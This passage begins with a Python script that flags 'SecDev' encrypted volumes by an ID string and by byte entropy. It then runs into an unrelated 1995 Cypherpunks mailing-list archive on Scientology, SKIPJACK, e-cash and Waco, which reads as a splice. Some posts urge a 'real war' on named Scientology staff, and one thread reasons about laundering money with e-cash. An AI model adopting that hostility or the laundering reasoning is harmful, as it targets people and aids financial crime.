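taken from the thread is that a SecDev 1.4 volume has the ASCII string
"SECDEV " starting at the fourth byte (offset 3). The sample "volumes" below
are constructed in this file; they are not real SecDev container images.
"""
import math
import random
from collections import Counter

SECDEV_MARKER = b"SECDEV "   # stated in the thread: starts at the fourth byte
MARKER_OFFSET = 3
# Assumed threshold: ciphertext and compressed data sit near 8 bits per byte,
# plain text and most application temp files well below 6.
HIGH_ENTROPY_BITS = 7.5


def has_secdev_marker(data: bytes) -> bool:
    """True if the plaintext identifier sits at the documented offset."""
    end = MARKER_OFFSET + len(SECDEV_MARKER)
    return len(data) >= end and data[MARKER_OFFSET:end] == SECDEV_MARKER


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def classify(data: bytes) -> str:
    """Why the file stands out, if it does.

    'marker'  : identifiable by the plaintext ID string alone
    'entropy' : no marker, but uniformly random-looking content, which is
                not what a leftover temp file looks like either
    'plain'   : neither signal
    """
    if has_secdev_marker(data):
        return "marker"
    if shannon_entropy(data) >= HIGH_ENTROPY_BITS:
        return "entropy"
    return "plain"


def constructed_samples() -> dict:
    """Three constructed files (not real SecDev images) covering each case."""
    rng = random.Random(1995)                                # seeded: reproducible
    body = bytes(rng.getrandbits(8) for _ in range(4096))    # stands in for ciphertext
    return {
        # what the poster observed: 3 leading bytes (unknown here, zeroed),
        # then "SECDEV ", then ciphertext
        "secdev_volume": b"\x00\x00\x00" + SECDEV_MARKER + body,
        # the same ciphertext with the ID string patched out, as the reply suggests
        "patched_volume": b"\x00\x00\x00" + b"\x00" * len(SECDEV_MARKER) + body,
        # a genuine leftover temp file: low-entropy text
        "leftover_tmp": b"Unsaved document buffer\r\n" * 160,
    }


def report() -> dict:
    """Verdict for every constructed sample, keyed by sample name."""
    return {name: classify(data) for name, data in constructed_samples().items()}


if __name__ == "__main__":
    for name, verdict in report().items():
        print(f"{name:16s} {verdict}")
```

Patching the marker out of the source silences the first check but not the second: a file of uniformly random bytes scores close to 8 bits per byte, while text and most application temp files sit far lower. Anyone auditing a managed machine for hidden containers would run exactly this kind of entropy sweep, which is the caveat the reply is making.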
From buster at klaine.pp.fi Wed Sep 6 04:37:21 1995
From: buster at klaine.pp.fi (Kari Laine)
Date: Wed, 6 Sep 95 04:37:21 PDT
Subject: Police and scientology visit XS4ALL Amsterdam
Message-ID: <199509061135.AA26720@personal.eunet.fi>

> PRESS RELEASE
> -------------
> Police and members of Scientology church enter offices of XS4ALL
> ================================================================

They really are not getting it - are they stupid or what? Scientology people are not behaving, so I take the stand that I don't have to behave when I treat them as well. Good, remember they started it ...

> Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
> bailiff.

Sorry to hear that, Mr. Braan.

> Religious Technology Centre

Oh, come on - that name sounds great. What's inside it? Research department of Brainwashing? Wasn't that the technology you tried to sell to the CIA? And luckily the CIA told you to piss off.

> , better known as the Scientology Church, or
> Scientology for short. He was assisted by a local police officer and Mr.
> Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
> in The Netherlands.

We would need a list of all legal offices representing scienos in all countries. Also, does anyone have a list of top scienos and some kind of organization flow chart of this evil empire?

> Also present were two computer experts (Mr. Ootjes
> and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
> two American employees of Scientology, Mr. Weightman and Ms. Jenssen.

Does anyone have a tel number for these Co$s?

> Scientology is filing for seizure of XS4ALL's computer equipment. Under
> dutch law, this means that a bailiff comes in to record your assets. In
> real-life, the computer-experts that were present have recorded the
> types and serial numbers of all the computers in our offices. They did
> not take any equipment, the continuity of XS4ALL's services is not in
> jeopardy.

Good - you have civilised police there.
> XS4ALL is not alone in receiving this kind of attention from
> Scientology. Scientology, a semi-religious multinational, is at war with
> a number of people on the Internet.

They want a war - well, let's give them one! I don't mean this bashing in the net - I mean a REAL WAR! Co$ has been on the offensive for some time now and they must be put on the defensive.

> Until recently, the church has always managed to suppress critical voices
> by means of sheer intimidation and by engaging in endless legal battle.

I think it would be a jolly good day if they would try that against me. I would make the best of it...

> One of these documents is a piece to which Scientology supposedly holds
> the copyright and which has been added to the kit without the church's
> permission.

Screw their permission. Sorry for the raw language, but I get so damn angry when I even see these scienos mentioned.

To fight them we need an organization to fight them. Today's situation is like uncontrolled and therefore unoptimised guerrilla operations. Results will be weak.

Best Regards
Kari Laine

Kari Laine            buster at klaine.pp.fi
LAN Vision Oy         Tel. +358-0-502 1947
Sinikalliontie 14     Fax  +358-0-524 149
02630 ESPOO           BBS  +358-0-502 1576/1456
FINLAND

From bianco at itribe.net Wed Sep 6 05:48:12 1995
From: bianco at itribe.net (David J. Bianco)
Date: Wed, 6 Sep 95 05:48:12 PDT
Subject: Searchable Crypto Paper Archive?
Message-ID: <199509061244.IAA01601@gatekeeper.itribe.net>

[My apologies if this is a repost. The original was posted a couple of days ago via a news gateway which may or may not have actually worked.]

I was trying to dig up some cryptography papers cited as references today, when a thought hit me; there seem to be a fair amount of crypto papers available on the Net, but they're pretty scattered. Bell Labs has some online, which is great! The cypherpunks FTP archive has a few, though you can't perform keyword searches against them.
In short, it's hard to find papers unless you already know what you want and where it might be.

Having had some experience in designing and implementing technical report retrieval services, I naturally think there's room for improvement here. 8-)

What I have in mind is something like NASA's NTRS ("NASA Technical Report Server", ), which I helped design and implement at my last job. The basic idea behind NTRS is that users submit a query to a sort of "search multiplexer" which queries a list of selected databases, merges the separate result sets and gives them back to the user. The results are typically bibliographic and abstract data about papers, which contain links to the papers themselves if they are available online, or ordering info if they're not. From past experience, I think this model could be applied here very successfully.

One way to accomplish this would be to establish an archive where people could submit papers to be indexed. Larger institutions (such as Bell Labs) might run their own servers, so they would have control of their own content but could still be searched via the multiplexer. Users of the service could then search all the different archives they were interested in with one simple query.

Anyway, this is what I'd like to see. I'm willing to work on such a system if there's enough positive feedback. Does anyone else think they'd like to use or contribute to such a system?

--
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                   |
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL : http://www.itribe.net/~bianco/

From rah at shipwright.com Wed Sep 6 06:03:28 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 6 Sep 95 06:03:28 PDT
Subject: Lotus Notes vs. the Web and the Net
Message-ID:

At 11:29 PM 9/5/95, Timothy C. May wrote:
>On this one I agree...and I've said this here on this list.
> Local groups,
>such as university departments, corporate departments, even entire
>corporations, can use the Web/Net in ways similar to what Lotus Notes
>provides (using their own LANs, or even the Internet, with suitable
>security steps).

My favorite financial application for small multinationals (one of my clients is a haircutter with 50 salons and 4 schools worldwide) is nightly remittances to the home office in e$, especially in cash. The consequences for the banking and tax systems are obvious. But it's possible to imagine interesting changes in the foreign exchange markets as well ...

Cheers,
Bob Hettinga
-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From m5 at dev.tivoli.com Wed Sep 6 06:13:41 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Wed, 6 Sep 95 06:13:41 PDT
Subject: Another Son of Clipper discussion paper
In-Reply-To:
Message-ID: <9509061312.AA12676@alpha>

Lucky Green writes:
> Windows 95 is on a lot of people's hard drives. It is therefore public and
> available for every one's inspection. How many people do you know that
> have reverse engineered Windows 95. How many of those use a reverse
> engineered version. I'd venture it is zero out of zero.

Problems with this analogy:

1) Windows 95 is somewhat bigger than your typical encryption routine;

2) The factor of motivation isn't considered.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX      |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From schneier at winternet.com Wed Sep 6 07:09:33 1995
From: schneier at winternet.com (Bruce Schneier)
Date: Wed, 6 Sep 95 07:09:33 PDT
Subject: the S-1 Algorithm
Message-ID: <199509061409.JAA05371@subzero>

[I just posted this to sci.crypt. I don't normally read Cypherpunks, so please forward any substantive replies directly to me. Thanks. -Bruce]

I was in Europe while S-1 was posted, so I missed most of the discussion. Better late than never....

Over the last year, I have spent considerable effort collecting SKIPJACK information. I have gone through the published literature, the rumors, and a large stack of documents received by EPIC through Freedom of Information Act (FOIA) lawsuits. At Crypto last week I gave a Rump Session talk entitled "Reverse Engineering SKIPJACK from Open Sources." I prepared the slides before I left for Europe. Here is what I said:

What the government told us:

Single-key block cipher.
Can be used in ECB, CBC, CFB, or OFB.
64-bit block size.
80-bit key size.

What the review committee told us:

32 rounds.
No weak keys (like DES has).
No key complementation property (like DES has).

What the hardware specifications tell us:

The latency of the Mykotronx chip is 64 clock cycles. This means two clock cycles per round.

Assorted rumors (excuse me if I don't reveal sources):

SKIPJACK does not have rounds in the same sense that DES does: i.e., half of the text block is not encrypted in each round.

SKIPJACK has half the total S-box data as DES.

SKIPJACK has a 48-bit internal structure analogous to a 32-bit internal structure in DES.

The masks for the Clipper/Capstone chip are unclassified and the chips can be produced in an unclassified foundry. Part of the programming in the secure vault includes installing part of the SKIPJACK algorithm.
The part of the algorithm installed in the secure vault is the "S-tables", suggesting that perhaps unprogrammed Clipper chips can be programmed to implement other 80-bit key, 32-round ciphers.

Trying to puzzle out the meaning of the third rumor, Matt Blaze and I invented something called an Unbalanced Feistel Network. These are Feistel networks where the source and target blocks are of different size. For example, in each round 48 bits might be used as an input into the F function, and produce 16 output bits to be XORed with the remainder of the bits. We called this a 48:16 UFN, and we proposed a design at last year's Algorithms Workshop in Leuven. Our design was broken, but I am still examining the structure. A 48:16 UFN satisfies the first and third rumor above, and I think it is as good a guess as any regarding SKIPJACK.

A few months ago, I found some additional information in the form of documents released under FOIA. One document was a Mykotronx design review for "Project Capstone" dated 10 December 1991. The design review was unclassified. Among the details about the modular multipliers and the SHA code was the following page about SKIPJACK:

ECB Processing Rate

      2 clocks per G-Box operation
  x   1 G-box per shift
  x  32 shifts per ECB encryption
  ______________________________
     64 clocks per ECB

64 clocks per ECB / 64 bits out per ECB = 1 clock per bit

Yields 40 Mbit encryption using a 40 MHz clock.

The only other thing I found was a SECRET memo. The organization name (either from or to) is blacked out. The date is 25 August 1992. The subject is "SKIPJACK Revision." Paragraph 2 is blacked out, but paragraph 1 reads:

1. (U) The enclosed Informal Technical Report revises the F-table in SKIPJACK 3. No other aspect of the algorithm is changed.

That's it. Rounds are called "shifts," which seems to indicate that they are not "rounds" in the DES sense. A shift consists of a "G-box" operation, which includes not only what we call the F-function but the XOR as well.
And there is something called an F-table, which could be a table of constants or perhaps a table of functions. In any case, it is something that can be revised without changing the rest of the algorithm.

Now let's look at S-1. The most probable explanation is that it is a hoax. But it is a very good hoax:

The hoaxer knew enough about algorithm design to make a cipher that was not obviously lousy, while at the same time not unduly complicated.

The hoaxer knew enough to make a design that included three novel ideas not seen anywhere else: S-boxes that are created according to no known criteria, a G-table that chooses a rotation of S-boxes to use in a given round, and a bizarre key schedule.

The hoaxer knew enough about how algorithms are used in the military to make a spookish interface. I am particularly interested in the "zeroize" function, the separation of the key creation and key loading functions, and the key masking. Blaze said that the interface was similar to the Fortezza interface, but not the same.

The hoaxer knew about Blaze's and my MacGuffin paper and that we thought SKIPJACK was a 48:16 UFN. We made no secret about this, and our paper is on Blaze's web page.

The hoaxer knew to use the term F-table. I haven't shown many people what I found in EPIC's documents, so the hoaxer either had to look through them himself or get them by some other means (maybe an independent FOIA request).

It's not a perfect hoax, though. The classification markings look odd: NSA algorithms are SECRET, not TOP SECRET, and the codeword restriction sentence is strange. The key schedule is hopelessly flawed (David Wagner posted an attack to sci.crypt). The coding style is amateurish, like it was translated from one language to another. (Maybe this is clever on the hoaxer's part.) And there's even a typo in the code.

And maybe the hardware latency is wrong. Clearly the design facilitates parallelization.
You can precompute all possible F-table outputs in previous shifts, and then use the G-table result to select between them; I am not sure you can get a shift down to two clock cycles. I don't have the hardware background, and would appreciate comments from others.

And why are there not bitwise permutations? If SKIPJACK is designed for hardware, it makes sense to put them in. They're free, after all.

Anyway, it's a real good hoax. Blaze estimated that he could have done it, but it would have taken him a month of effort. I agree with his assessment: one man-month. It's a lot of time to spend on a hoax, especially one where the hoaxer doesn't get any credit.

So, maybe it's SKIPJACK. It has a 64-bit block size and an 80-bit key size. It's a 48:16 UFN with 32 rounds (or shifts, or whatever). And it has an F-table. This is really interesting, because the structure really is an S-box. Everyone knows it's an S-box, and it makes no sense for a hoaxer to call it something else. But in S-1 it's called an F-table. (I think this is very significant, but others find it less convincing.)

And the F-table has been revised at least once. In the code it says that the F-table entries "differ in the S-2 version." The code is dated 1 February 1989 and 31 July 1991, and I have a memo dated 25 August 1992 that says the F-table has been revised in "SKIPJACK 3." Pretty convincing, I think. (Of course this means that we can't confirm anything by testing the hardware, since the F-table entries are different.)

Maybe there are no bit permutations because they make analysis harder, and perhaps they don't add all that much. Maybe the algorithm was designed for both hardware and software, or maybe it was designed for specialized cryptographic hardware with several parallel microprocessors and some cryptographic primitives.

If it is real, we have a lot to learn about S-box design. The S-boxes are not even balanced. Maybe they are created just so to avoid some bizarre attack we can only dream about, but I kind of doubt it. But the key schedule is just plain wrong.

So, here's a theory. Let's assume the code is real. (Not that it's SKIPJACK, but that it's a real algorithm from some military or some corporation.) Clearly the code is not designed to test the cryptographic algorithm, but to simulate some kind of hardware interface: it's called a "software chip simulator." If I were the NSA and I designed an algorithm whose security rested on some tables of constants, I might replace them with phony constants before giving them to another organization to test. I might call the phony version S-1 and the real version S-2. Maybe the code was originally written in FORTRAN, and then translated into C. (NSA doesn't use ADA.) NSA algorithms are classified SECRET, but perhaps algorithms in development are classified TOP SECRET. (We know cryptanalytic techniques can be TOP SECRET, so perhaps commented code falls under that category as well.) And maybe the code originally didn't have an 80-bit key schedule. Maybe it had a longer key schedule. The poster then modified this key schedule to make it look more like SKIPJACK. (This might also explain the bug in the code, which might not be a bug if it still had the original key schedule.)

Which leaves us precisely nowhere. The most likely explanation is that it is a hoax, but I am hard-pressed to imagine a hoaxer with the requisite combination of skills, resources, and attitude. I also don't believe that it is SKIPJACK. It might be a preliminary design for SKIPJACK, but if both the key schedule and F-table entries are wrong, we really haven't learned anything. If we suddenly discovered that unbalanced S-boxes are far superior to balanced ones, then all bets are off.
Bruce

************************************************************************
* Bruce Schneier              2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems         000,000,000,000,000,000,002,000,000,002,293
* schneier at counterpane.com   The last prime number...alphabetically!
* (708) 524-9461              Two vigintillion, two undecillion, two
* 730 Fair Oaks Ave.          trillion, two thousand, two hundred and
* Oak Park, IL 60302          ninety three.
************************************************************************

From mfroomki at umiami.ir.miami.edu Wed Sep 6 07:22:49 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Wed, 6 Sep 95 07:22:49 PDT
Subject: "This discussion is off-topic, please take it elsewhere"
In-Reply-To:
Message-ID:

You keep talking about this "Eric Hughes" nym. I've been a member of this list for weeks, months, over a year even, and I never see any posts from "him". Is he a dead tentacle?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law     | P.O. Box 248087
                           | It's hot here. And humid.
Coral Gables, FL 33124 USA | This post is smiley-free and may injure the humor-impaired.

From tunny at Inference.COM Wed Sep 6 07:49:18 1995
From: tunny at Inference.COM (James A. Tunnicliffe)
Date: Wed, 6 Sep 95 07:49:18 PDT
Subject: Equinox/cypherpunks/www
Message-ID: <304DB3A8@smtp-pc>

> Anyone that missed or was unable to get the UK TV programme Equinox
> might like to take a look at:
>
> http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html
>
> - Andy

Thanks for the pointer. I was reading through their nicely organized gentle introduction to basic concepts, when I nearly sprayed coffee all over my monitor from laughing so hard at the following gaffe:

"...most modern codes rely on the intractable mathematical problem of 'factorisation'.
This is the process of trying to find the two prime factors that, multiplied together, would give you a third prime number. [JT: Yes, I'd call that an intractable problem, all right.] For example, if you take 3337 - a prime number (i.e. a number that has precisely two divisors) - how would you find its two prime factors? (They are, in fact, 47 and 71.)"

A little unclear on that "prime" thing, it sounds like... :-)

- Tunny
______________________________________________________________________
James A. Tunnicliffe     | WWWeb: http://www.inference.com/~tunny
Inference Corporation    | PGP Fingerprint: CA 23 E2 F3 AC 2D 0C 77
tunny at Inference.com      | <--finger for key 36 07 D9 33 3D 32 53 9C
======================================================================

From anon-remailer at utopia.hacktic.nl Wed Sep 6 08:14:19 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 6 Sep 95 08:14:19 PDT
Subject: Michael Moriarity in _Penthouse_ on Law Enforcer Power Expansion
Message-ID: <199509061513.RAA17510@utopia.hacktic.nl>

From: "Clay Irving"
Date: Wed, 6 Sep 1995 07:36:47 -0500
To: sea-list at panix.com
Subject: (Fwd) Michael Moriarity in _Penthousse_
Mime-Version: 1.0

Thought I'd pass this along -- It was in my mailbox this morning...

--- Forwarded mail from "Linda Thompson, American Justice Federation"

Date: Wed, 6 Sep 95 02:52 EST
To: news at aen.org
From: lindat at iquest.net (Linda Thompson, American Justice Federation)
Subject: Michael Moriarity in _Penthousse_

In the "Special 26th Anniversary Issue -- Collector's Edition" of _Penthouse_, Michael Moriarity wrote the "Advise & Dissent" feature. The cover tickler reads: "Michael Moriarity -- Charging Janet Reno with Genocide"

TREES FOR ALL THE DEAD CHILDREN
by Michael Moriarity

[The author is an Emmy, Tony, and Golden Globe award-winning actor. He is also an accomplished classical and jazz pianist-composer, with three CDs in release and another about to be recorded.]
_A nation may lose its liberties in a day and not miss them for a century._
Montesquieu

I am sitting in a sidewalk cafe in Canada at the moment. I am here because I can no longer live in the United States of America. The nation my father knew as a surgeon for the Detroit Police Department and the country in which my grandfather built a 50-year professional baseball career has become a nightmare of lies, propaganda, and vicious disinformation pouring out of Washington, D.C.

Today, the F.B.I. and Janet Reno are asking for new legislation that would permit them to investigate anyone for simply opposing their ideas of what causes violence. I protested the attorney general's initial assault on network television during her back-room meetings with NBC executives. "What are we talking about here?" asked Dick Wolf, executive producer of "Law and Order." "Federally controlled programming between the hours of three and six?"

"How about three to nine." Janet Reno said that without a question mark. It was not a request. It seemed to her a foregone conclusion. She had the right to say the most insane thing I've heard from a reasonably well-dressed person, let alone the highest law-enforcement officer in the land. She claimed that the mere words of a murder-mystery TV show were dangerous to the health of the nation.

I simply asked that she be relieved of her post and sent on a long vacation and given therapy. Who left their jobs instead? Philip Heymann, her respected deputy, and yours truly. Resignations in protest.

Now she and her Justice Department -- and even more recently, Bob Dole, the next frighteningly viable candidate for president of the United States -- would like to brand all artists and producers dealing with dramatized violence and sex as accessories to drive-by shootings, terrorist bombings, and the moral degeneration of our nation.
And she's hoping that people like me and Rush Limbaugh, and anyone who makes fun of her, like David Letterman, will be counted by the American public as accessories to the bombing in Oklahoma.

Did Al Capone really learn everything he knew from George Raft? Was the death of Christopher Marlowe a product of the fight scenes in William Shakespeare's _Romeo and Juliet_? Blaming violent drama for real-life violence is like indicting _Penthouse_ for the spread of AIDS.

Until I left my country, I was living in a novel by Franz Kafka, with characters like the real Elie Wiesel telling me, "It's not possible, Michael. This is America." They told Elie and his family the same thing in Europe, just before they carted him off to Auschwitz. "It's not possible, Elie. This is Germany."

How far is Janet Reno willing to go in her definition of what is causing violence? "I know 'Murder She Wrote' has no violent images," said the attorney general, "but they talk about nothing but violence." What does this mean? Does she charge that Jessica Fletcher was an agent provocateur for Timothy McVeigh in the Oklahoma City bombing? Has Angela Lansbury been derelict in her concern for the children?

Was Reno's fear of language, this frontal assault on the entire meaning of the First Amendment, merely a lapse in the attorney general's thinking process? As "kooky" and as "noisy" and as "paranoid" as I am accused of being, I have never put together a sentence quite that sick.

Where was the reaction from the Fourth Estate, the one branch of our democratic process that is sworn, above all, to uphold our freedom of speech? Today, unfortunately, the media is a direct extension of the two-party system, and now that the Republicans and Democrats are a coalition dedicated to expanding federal law-enforcement armies exponentially, there is little protest from the pundits. A coalition in a two-party democracy is not an option. It is tyranny.
Since mainstream American journalism is either Republican or Democratic, we now hear no outcry (although _The New York Times_ did quote one "law-enforcement official at the Treasury Department ... who spoke on condition that he not be named, [who] said there was a tremendous potential for abuse in some of the recent F.B.I. proposals to relax the standards for investigating suspected terrorists").

Speaking out publicly would risk careers, and if anything is at fault for the disastrous situation we are in, it is a mad obsession with career. Read John Dean's _Blind Ambition_ if you don't believe me. My role in the miniseries "Holocaust" -- that of the Nazi lawyer Eric Dorf -- was inspired by the idea that if Watergate's John Dean were a German professional in the 1930s and less sensitive to his own corruption, he would have risen to the very top of the Third Reich. With no strong feelings, apart from an obsession with his own career, such a man would find himself standing proudly at the side of Adolf Hitler.

"Free speech," the Justice Department seems to be saying, "is the root cause of all violence." Has anyone been fired for such a tyrannical notion? No, but Jocelyn Elders was dismissed for broaching the possibility that our drug laws should be reexamined, and for speaking honestly about AIDS and condoms and children.

I began my campaign fighting the drug laws. I'm right back to those statutes as the main cause of domestic violence in America. Only this time the violence is not the drive-by shootings in ghettos. It is the speed with which our law enforcement has been destroyed from within by its own increasing power. The F.B.I. will be given almost absolute power to harass and wiretap and investigate any opponent of the standing government. The drug laws and now, so conveniently, the Oklahoma City bombing are the linchpins for billions of dollars pouring into the American law-enforcement community.
Their increasing freedom to hassle suspected anti-big-government agitators must not be threatened.

Will it work? Not if this nation sees the tapes called _Waco: The Big Lie_, a two-part examination of the murder of the Branch Davidians. This video, which Gary Null wrote about in _Penthouse_ this past April, is all over the country now, and more and more people will see it despite how Janet Reno, the F.B.I., and the leadership of both parties try to misinform the public about the tapes and their maker, Linda Thompson.

The obvious questions raised by Thompson's analysis of government-approved violence are damning to the F.B.I., the Bureau of Alcohol, Tobacco, and Firearms, Janet Reno, and all other parties accessory to the obvious cover-up. They show hard evidence of a government lynch mob at Waco. If the Rodney King tapes won him $2 million, the implications of _Waco: The Big Lie_ could win the surviving Branch Davidians tens and possibly hundreds of millions from the government, criminal charges against perpetrators, and the downfall of major careerists in the current administration.

Now, with the help of her spokesmen, who just happen to be President Clinton and Bob Dole, possibly the next occupant of the White House, Janet Reno is trying to convince America that her enemies are just as bad as her own army. They can't be worse. Try as she may, she knows that history cannot draw the bombers of children as any worse than the burners of children.

Washington, D.C., is saying that there is a difference between the children of Waco and the children of Oklahoma City. The deaths in Oklahoma warrant capital punishment. "Swift and severe punishment" was the fate the president and attorney general promised for the killers of federal employees. Since the F.B.I., the C.I.A., A.T.F., and other arms of federal law enforcement have been gutting the Bill of Rights for years, such threats are not unlike the reprisals announced in Germany following the Reichstag fire.
What about the death of civilians? Not only does Reno not call for capital punishment for the incineration of the Waco children and the equally cold-blooded murders in Idaho of survivalist Randy Weaver's wife and child by federal agents, her response to these crimes doesn't even merit the term _pursuit of justice_. And any movement that calls for such justice, like Linda Thompson's American Justice Federation, is branded "fanatic."

Who has more blood on their hands? Network television or federal law enforcement?

Until justice befalls the Justice Department, a tree must be planted for all the children of violence ... including the children of Waco.

"Peace is not the absence of war," said one letter written to me while I was performing in the television series "Law and Order." "It is the presence of Just."

---End of forwarded mail from "Linda Thompson, American Justice Federation"

--
Clay Irving - N2VKG - (clay at panix.com)
http://www.panix.com/clay

From wilcoxb at nag.cs.colorado.edu Wed Sep 6 08:46:25 1995
From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox)
Date: Wed, 6 Sep 95 08:46:25 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To:
Message-ID: <199509061545.JAA24947@nag.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I, Bryce Wilcox wrote:
>
> > Suppose you have acquired a million dollars worth of legal, above-board
> > DigiCash dollars and you want to surreptitiously transfer this wealth to
> > a below-board friend. Your friend creates a temporary anonymous account
> > at an understanding bank.

shamrock at netcom.com (Lucky Green) wrote:
>
> Won't work. Ecash, except as used for frequent flyer like points, will
> exist in only *one* world wide e$ currency, issued by a single entity
> composed of various major banks and subject to US laws.
Getting Ecash
> accounts will therefore be subject to the same legal requirements that
> apply to normal US checking accounts.

1. Sez who?

2. We are discussing the feasibility of using DigiCash currency for illegal money laundering. We have to assume (ceteris paribus) that the would-be launderers are still capable of the same tricks that they are currently capable of, which, apparently, includes access to anonymous bank accounts.

> > Now without active physical surveillance, nobody other than yourself and
> > your friend will ever know where the money went, and you can't prove
> > that you gave it to him, either...

> You or a sting operation can always reveal the recipient by publishing the
> blinding factor.

If you do it via his one-time bank account then you can only reveal to which one-time anonymous account you transferred the money-- no more. Even if you and your beneficiary don't have this option, the transaction is still much safer and more convenient if done via DigiCash than via any other current currency. Criminals and conspirators live with the ever-present problem of betrayal, and this "one step, one way, requires the cooperation of the payer" traceability seems to me to be a small hassle on the way to a big win for such people.

> Besides, your Ecash client keeps a log of the payees.

Cryptographically (and in the limit, legally) meaningless, right? I could edit my log right now to say I gave you a thousand cyberbucks in return for an illegal copy of some information, but no-one would care.

I appreciate your correspondence.

Bryce

signatures follow:
+ public key on keyservers /.
island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME3CFvWZSllhfG25AQFi3gQAmyJoB3RJKx3lNb1fCLPluulVbi6kh3+I
++fGXC8vTGOEfaNnkjOxvcZ5VCXRJNlwQB9D2hKICSJCxpoQWKSDjgEWy48HH8AV
P0LSBfQ/LX9O91X7/dkyBCDoULhPx2HYTSbOgumS10+X/IsldUfcY36q0tTQy3u7
7ES5HIG2wv8=
=idOQ
-----END PGP SIGNATURE-----

From jonathon at japan.sbi.com Wed Sep 6 09:17:28 1995
From: jonathon at japan.sbi.com (Jonathon Fletcher)
Date: Wed, 6 Sep 95 09:17:28 PDT
Subject: "This discussion is off-topic, please take it elsewhere"
In-Reply-To:
Message-ID:

On Wed, 6 Sep 1995, Michael Froomkin wrote:
>
> You keep talking about this "Eric Hughes" nym. I've been a member of
> this list for weeks, months, over a year even, and I never see any posts
> from "him". Is he a dead tentacle?

[deleted]

> This post is smiley-free and may injure the humor-impaired.
>

is he kidding ?

-Jon

PS: In case I qualify as humor impaired - Eric 'potty-trains' majordomo.

-- 
Jonathon Fletcher, Salomon Brothers Asia Limited, Tokyo
jonathon at japan.sbi.com

From tcmay at got.net Wed Sep 6 09:25:08 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 09:25:08 PDT
Subject: Searchable Crypto Paper Archive?
Message-ID:

At 12:48 PM 9/6/95, David J. Bianco wrote:
>I was trying to dig up some cryptography papers cited as references
>today, when a thought hit me; there seem to be a fair amount of crypto
>papers available on the Net, but they're pretty scattered. Bell Labs
>has some online, which is great! The cypherpunks FTP archive has a
>few, though you can't perform keyword searches against them. In
>short, it's hard to find papers unless you already know what you want
>and where it might be.
>
>Having had some experience in designing and implementing technical
>report retrieval services, I naturally think there's room for
>improvement here.
8-) What I have in mind is something like NASA's
>NTRS ("NASA Technical Report Server",
>), which I helped
>design and implement at my last job.

It's an idea with some attraction. But some issues need discussing. Being an analytical sort of person, prone to looking for flaws in ideas, I'll mention a few:

1. First and foremost, _copyright_ issues. Most articles are copyrighted (automatically, by Berne Convention) and the permission of the authors must be obtained. Authors may also collect royalties, or the conferences may, so unlimited electronic distribution is a potential problem.

NASA can publish its reports (and those of other government agencies) electronically because it has the copyrights, or the copyrights are free and clear. Try putting someone's article on the Net without their permission and look out.

Indeed, there are a couple of the most important papers on the soda archive site, some of them scanned-in and OCRed by "The Information Liberation Front." There are so few that the authors likely don't even know they are there, or care. But try to put lots of copyrighted material on a site and get ready for actions. Remember, most nations are party to the Berne Convention(s).

2. Many of the papers have complex typography, lots of equations and diagrams. These reproduce poorly on most screens, and really need a new level of display presentation. (Yes, I know about Adobe Acrobat, which I have. Ditto for FrameMaker, and a few other such systems. But not many others have them.)

I happen to know the ILF member who posted the Chaum "Dining Cryptographers" paper, anonymously, and know that he picked that paper both because of its importance to his interests and because it was pure text, with no equations and no diagrams. This made it a natural for scanning.

3. In the crypto domain, the papers are much more conveniently concentrated into a handful of conference proceedings, nearly all published by Springer-Verlag. (Those great silvery-grey paperbacks.)
This point about Springer-Verlag relates to Item #1 above. Namely, that copyright holders (Springer-Verlag, through publishing arrangements with the conferences) will not take kindly to folks making the papers available electronically.

This point, about the limited number of main crypto volumes, also implies another point: many of these papers refer to other papers in the same volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will refer to papers in that volume or earlier volumes). This makes it *even more advantageous* for a serious researcher to buy the complete set of volumes.

4. Authentication issues. Electronic versions of articles will need to be signed, to prevent unauthorized modifications. The infrastructure for this is beginning to build, but is clearly not available to many.

I am confident that someday most journals will be published electronically. Many people think this likely, whether in 5 years or 15 years. Just too many advantages.

However--and this is my point--before that happens a huge amount of negotiation about author's rights to reproduction, about verification of copies, about royalty payments for copies, etc., has to happen. And, the display software/hardware is not quite there yet....too many people would be unable to see the equations and diagrams on the screen. In 5 years, less of a problem.

Many authors make their papers available by anonymous ftp, or via the Web. I think this is the way to do it: let those who feel their papers need electronic dissemination do so. The author makes the choice.

In summary, this project is probably premature (technologically), has numerous copyright issues to be resolved, and is probably less needed in the crypto community than in some other areas.

